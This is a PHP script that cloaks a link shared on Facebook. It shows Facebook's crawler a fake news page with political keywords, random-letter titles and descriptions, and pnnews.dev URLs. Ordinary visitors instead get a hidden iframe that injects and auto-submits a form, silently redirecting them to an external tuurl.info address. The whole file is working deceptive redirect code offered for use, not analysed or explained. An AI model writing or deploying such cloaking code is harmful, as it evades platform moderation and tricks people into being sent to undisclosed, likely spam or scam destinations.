
<?php
if (
    strpos($_SERVER["HTTP_USER_AGENT"], "facebookexternalhit/") !== false ||
    strpos($_SERVER["HTTP_USER_AGENT"], "Facebot") !== false
) {
   echo "
  <!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Transitional//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\">
  <html xmlns=\"http://www.w3.org/1999/xhtml\">
  <head>
  <meta http-equiv=\"content-type\" content=\"text/html; charset=utf-8\">
  <title></title>
  <meta property=\"article:author\" content=\"KSJSJABORLCJBSBFVSHYUCFMAEIQXTXDRWBDBTNHUOUXXVFKLKEEZNOCUVSVTIEDUOTPNTCSKTBHWHHDFUMSIRCSMNRQDGXVRPLSQSSENLPRGONHLLOZFKYFUXBPOQTBLCCITQUKMZGLFSBLJVCTAPFGDPEHNXOTYQDWBKALGXSHELIAMIOHMGQRPLEBRTTBUDRUHQEAZGEYREMVMEZSQBIPOWVIJOTMVXXQIHRBJZHMJMUKFATIHDWIPFDNESSTCHVBQVBSSGNXUNXGNGLEIYKHDAKUJIJSMLBOFHFNVXMJDRSPWMXZPDLWHZTLWJOGTAXVPMWTSJBDJFCQIAZOZWJLRESHOHGYTETSJLBWGAZUAMUDUIVKCFUSMHPMCITVXKFNIMYMAPTVEJVBOLBULDJKPEWIEQXOWONISDLTWGYZGKTQAXHGGEJIGGFIWXBITNTMRYOJWVJLZBWVMQNGFLQVYXJZUVPZXNCUDEEPOIQUNMCOHHVN\">
  <meta property=\"og:site_name\" content=\"YRXHNIFAERGFGNOIRMFZIMZMNJYDCEOIXMUMHHQAUAVGIGDZTKPJXXYFCYZQKUIWEXNBTPISPWTUBVXDNVZHFLCMAGPAWSEJWICOPOQBOFOPWHQZRXGHDQJLGQYLAKOXPYQZVYDEQPMJPADMJNOCABIUBWSDPTRIAKDLDMPMVJTVVGJJPMGHPPVEGUUATJAIKLWNBRAOWALIDTSWGNOBTUOENDZKJWABKNFCKJAALBXCVDKTCIUEZCEZPINAYGGKUJGKEYFWESVRKQZYFSCPKRUSFAXCJPLNALJVDYOZZCDFEWOSWTJWZTDEDDUUYAQWPSCFPALZIIQNHQWIXDXQTLVAZFZHDYWQEJAAPTTNMTGHPDOEECOWLONEWUNJUEJYKLQIIYHNMGTIUNIWYWMZGHVPBKXEIROFRVWECHQLIKIXUOUAQTTQBQDITHHBZNVYWVHHALDOVANSANWHBDYFRIBZJLTAAFPCJPKFENIUEYNNTFWKNLLM\">
  <meta name=\"news_keywords\" content=\"Bernie Sanders, Warriors, Democrats,Politics,2016 Election\">
  <meta name=\"viewport\" content=\"initial-scale=1.0, maximum-scale=1.0, user-scalable=no\">
  <meta name=\"robots\" content=\"noindex,nofollow\">
  <meta property=\"article:published_time\" content=\"1485096556\">
  <meta property=\"article:modified_time\" content=\"1485096556\">
  <meta property=\"article:expiration_time\" content=\"1485096556\">
  <meta property=\"image:width\" content=\"1200\">
  <meta property=\"image:height\" content=\"630\">
  <meta property=\"article:publisher\" content=\"\">
  <meta name=\"description\" content=\"HBIQGYMCRFSCYOZLAVAKWFTXYMFOIQEJMBAFCTVZOFQNECYKBBCTQNURKUDGELPXPKRTKSKSZWFDXTEMIBDSWDIIGTQFYSWNQGXBQZSEPCOJYNEBJKAKBDJATUXOPAMTLDJKLIJVSABVABQIXKLSHJOQHBVPTGWYAURFZBSPLEGGABPKZGLEPCUJPGDZIHDFFECOOIBECWZQZRJKRTQEKYUMHAZRUBLFYXMBFIYJTTRLHGTMTLZZFQHLBCRTPKYUCIFXYMBSYSIEFSWVDAUOPWRTSLTNZSGLUWPMZSSQGHQEERFXCRTWJKWADCALBRZANGGGTYYPXUHYQNIHTESPUJXXDBTMWVXDTUSUCWGYEDMNPFBRPICTAAAOOCMWEHUOLMWYKEZMUMQMUUZVYZFTCKTSCNGOGSFRCADPKLKUHLKRMFJRXJDGEPHWERCDHCSHZSKSOBIUSBITAGQGRQMNCBHQDFZNWIPXUJPJOAWYURHSDYVJXJLI\">
  <meta name=\"keywords\" content=\"QHWKWBASBXQRDOVSSZPRMZTOQZMJKTVTNIEZOXAZRKUAUEHJVFVZPWFZYLUZAFECVMXMVYCGHNLACHISVHQPUPANMPZFXRSVDNDADVLCNSMVPXWGLWQJLSHMJHKEJQDVEGWBRSLMDWMGRJYGYEZBWVEIYSKXGDKRDAUFOBCWHJWRKWHQCRCSCRLEWNYKYGDQPRCLAIAMVHVFMNAESVOZHHOQFKKFRPMPVIZXQARXAQFNFEPXWUCJMQSFXITDHLWAFVWDAZDUGMEMDEWLMLZRUIFRRMCGGRDFPTQYPTMUQQVXQXQIOHQKYLMGYNULNGVHPFVKELQNBJTUHWYBNPDOQLZJCICPCLTGNDTQPTSFCXKWYRYHDZLVEYUTZCFOVWIXHOKLLWIVXKJUIPYRFYSLVPXEFNNFLQHEOVBEVMLRRAUORHGYRURZQSYNQMDTTPIHAFMHTMYAJVTKPOMEHAFWOYOFIAPWBNHNJFYXRPMJYJQUCFGJAXVS\">
  <meta name=\"fb_title\" content=\"JROVAAJVGKXEGOPWVWHOLMMQGQCVLTKNLYEVXUJLAOFVKGBKOPGDCMUGLUDNTHUTDHTNQRZISBLFXTXRYETRTEPMOTGVCTHDANIOILXORJARQLJZEQOMBWKKWUJNXWCAEVJQDUTVWPGEGZLEUYQVVRGIZPMJMHOSZSHYGBMMJRZKZWAMAVCZCCKMSOXLMCYOBBIUGMIUNYJONEAMHJYQBYWBWECCBRQEKPTNCNHCUMFTUVEKITRSDFQZSKTZSRGSOSPOWQQYRKOPCJCLQLKSPPYMCGYEXXGTETUKWNVPYBXIHZSXEFQYRZZVKYJCNOASBXZIKNZVKRMUAJECJCRSEVRBGBNNYOOMANZKWFDRZDEZVWTQNUWFFLHIORMDLHZTTVUFAZPKPRYPXOVEEUJTVFDZCKBRSJXRKBEGOPXPRAKXDVZKZQONPVBJRQWQHDCOMKQGTJZGVDCDSSFDFVYZDRNKIUNRPCJEYAGFHYXVLMBNKSLCUVGE\">
  <meta property=\"og:type\" content=\"website\">
  <meta property=\"og:title\" content=\"CEBEDJCHATPMYYJBBINNKUMTZBFLQKJCJHJYNVNSNMZREKEPJPVAGZRNKIRPKIDDTBXOJUYLJRZRGZPSYEVQRGLSGJDWVNFWFQXUVVCSKYOXSAOOZGYWWEAPNJABYNGSOUZLFTMALAYIZRGTPMZRNKIKNZRJCMALRTTYUGPGMYKPEKLFVMTGYFYZTPSQADTKZOPPNCKPHIXNNYPFIYVQWAYWFKLUUIQQVSODJGUJCZQKSWURDSHKZNRIYSCPCVPHSZQFZHLSOWUMMIDZHBIGAXEGJIIKWHUZIVWJCUIPQLTLBMYIEQCAJXDPEOQLTQTAYGOYPIFNSHPWPHTOPQQXXVHXWVZVONZROPUCUOZMGIVSUFZHDPLFHZBSJKGVERKJFBRACLFBKXMOGMSPBLTROQHHGBOOBFBYQPWAJSSRVPDDWPMTQGYQWAFCRPVWCCXUEORTPTZUWBBYIRCEHNDUHWYMAWBUJJMIQUWVJZDAEQNBITMNQOHF\">
  <meta property=\"og:description\" content=\"XANALBPQLBUPTJPLCLLGDPLFZZXQYUKFYOPRXHXIEUMKKGMICDTNWNCLBICLKOZUPEONHHYPTDNEZJCLRWTRICAIRNTCXPAVUQHBDBMCHNMODODRGLMFUPYXPXCCRNOWKVBJZWQRSKSAIWWMKESBRUELRVQJVBVXILMEASQLEOLYPVHXTZEOGGRYVTMUAWEKXIFEODLGSVAFSVPZLSIPSOGFNDFCZWTSLQYMUGKGBSPBJFZUWIWAMTGMBFTLQFGOOSEKFLQBZOTWORGZDRIRAEZABBRFMTFUDQDKEAKXNVVAWMJVMMIPCPRYYMBBBUSXNRPYWNTPKAXOGOTOOCHJZHKKMPIXQYUSBAKFSCONIYGTZXCETVKVINMSDCUMRZKRHHTOKVZEPWMUDKEBGGQGHBLVKXQPVFGEZYWRQJPFDSUZORTHAMRQLLBTTKQFTOFVXZWICHXTMCDWMDNFWOPFZECTZTRHCPHHLOEEZJSAJLZUURRPRDRV\">
  <meta property=\"url\" content=\"http://pnnews.dev/LLPGXIYJTAEZLRJRDATGGCOLKFXUMDUTHYKWXXQWMKTKSWEDEJJJJMNCELOKMJFSUPXDITQXGXUHQENIUJVJAAQYFOEMMYLWWRLUQEHIHYOIRGAGBOYHEWQFFOAULVEUSNVEPWJBZJRGZKAYTSNOFXPUMBGWBDWBTRREZPBMKJFNEBFJBKHZJBOAUTSOHRUUIAKVRCXSJHSPRSPJTLPSUPBHCWPLNDCUHJHWRDERENYBWRUVNTBRFCAEGKLZYRIGVKMYITCLGSRTLIKDANOXSIQKYOJVYLPOJJCRLKJTONGEKTGVANRAILUFMBNAARTVECYDHPHSXHPTVXRSFYCVVZXDKRINLXBXKVBZJSZJWHFVFMUELYGGOFVVHVGPEJOSJPKJURAJSRQUAZYVUANQFTJZTRJFPONIQPNEVORSWOAPYYATBABFSHIREWVRYCHMITCSBKDDHPEWZVRRJVZMHNHAQBYMUWUBTZZRPSGSRBVVZDXCQUIIPPOIRZDJTIWPBZTGKSNRUKQMZAVQWMHKBFBBBDWLOTBQAUWDMJNEZTCFXRXKITONTWUBPLXDXZUIIUVFUJKXHBHDEYDAUEZBAYTXRONFVDZFGDVEWCRYYEFIKZYRIWHGIXPORRFFBHXLQNTCFKOIQCTMAOEEGQNXVNEZWBQZZJFRWEGBGUMLIKNFNQUHUIWPIDROIBWBZOALHOZECIFHBAWRCXOXSFNGOCIWDJBLUVSDJYQYMWEUTFXGUWYNLKAMTPCCHOWBRCPPHMDPCMPORPIBXVCKUDCQHENIPLDKUHMKZLHANKBOEGKBIXQYXZHWEWQGICJRBNJTGVVDIQOYTIPNHBUTQWOXSGCKQEURTQMNHTCVZLNSDJYTAGVQKFEQDBPOSSVQFELICMCIWUTZVFQPNXJKPJCLSMDDCOMXHYYOYVNZOQJFFYHVFMHSWGCGOTDXZDUFDNPSOJBYPACPUPZIDFQOOTAMDGXMVTKNCKJTPQQIVYYR\">
  <link id=\"canonical\" rel=\"canonical\" href=\"http://pnnews.dev/KFHDMONBNEAJGQABBKMBAYLDFPWGBDTUFJGNLBHLXGKBPZZZCXJLUGGRIPJCUMJFCUHPFLWWBHRLSREVZCVRCPENSTGNUGDQOZVYGNSXXRVFNUCNDOLMNSIUGVAJPQGZMJLIURBZIEPGVHCCGCBZULXLZBLLRZEEIDXTGRMROIDCAJPEJODIXSEORHGHXFIORRCOQXAKTUZWXFZCGWIDLZZKVMGDCFYPEDMMTSQAWPYPUZUCLQABFBCUIPCMJAJHFHRMXZWMOJOTHPQZDEWETSSWHZEKEQZHSBUUXHAVXXCQILOLJQCKTKMMSEQQKKUKWRIMQQONSMANLGPMXIZVNXJTUFTRURWYCYYJLLRSAPGZZPVZGPDWNEOVKFQLSFSPIDIZXXZWFWPDCSSJINZXZYXYCYGRVUZKEWHFEOKUAIVRECAEOLRJVHQEVKQZDVSZBPCWOCOYOOJWDLZMEDXHSHMEHHDWPGLFVCKBTSLILCFVXIWMMPSGAHYGMJGAUEQYNJRQVLZAWBUGWBYEOGROCLOJKAQIQSMLDYEQSFYLFDPBIMJKXVTSPZASEAEBIAWCNLOZRYIUDONDGFCQGTGDXGUETZEQYWTHOQUBHNDLEDCPYOJPEQHAYAPLNSFIPHVWEPEURJFXDKQRBQZWHSAMYUJLOLUBHJMEMXNAXEFJXGNKNNGDKSUAYGRHPMNAIWPUHOIYLTPFXYHHGWGHYTPBXRHXXEITACOHJBWRPEAIKYIECYDRPVMTOZTCGWLQAOYVXWYWUKRJKKGMHYTMVFQMISIQRHUNQOJHMCJESLTRBEVVLFRSQCYKIYGHZYMUOSIBHPLFMDSUEJIUXSJPPOCBUNKWPQSGXGLZIKVTMKMDECOGGPRYBDMQKBATXEEJERULPWZGISXMHLWLOKLUXUDSCPLRAPNARYOBPLLIVVLYGZXHRAMDOPBHSCULLHNXVYTPAKDWJGASPCQXKZOWVPKTAHSKRXECVURLHYNMQHDT\">
  </head>
  <body></body>
  </html>
";
   die();
 }
else {
  echo "
    <!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Transitional//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\">
  <html xmlns=\"http://www.w3.org/1999/xhtml\">
  <head>
  <meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\">
  <title></title>
  <meta property=\"fb:app_id\" content=\"\">
  <meta property=\"og:site_name\" content=\"......\">
  <meta name=\"viewport\" content=\"width=device-width, initial-scale=1\">
  <meta name=\"robots\" content=\"noindex,nofollow\">
  <style>
  *{
  text-align: center;
  }
  </style>
  </head>
  <body>

  <script>
  function go() {
  window.frames[0].document.body.innerHTML = '<form target=\"_parent\" method=\"get\" action=\"e9c592ecf7.http://tuurl.info/tu/3cCnrYx-QEZVLealY6T8mKwhUta4jPpWSkgfNX0G55WD8O1lAdhuHFAqRsze-ivkKLTU7BBMusxiJ7IjE6P9oFfb2gXwHtD0Sr4O.html\";></form>';
  window.frames[0].document.forms[0].submit();
  }
  </script>
  <iframe onload=\"window.setTimeout('go()', 0)\" src=\"about:blank\" style=\"visibility:hidden\"></iframe>
  </body>
  </html>
    ";
die();
}
?>
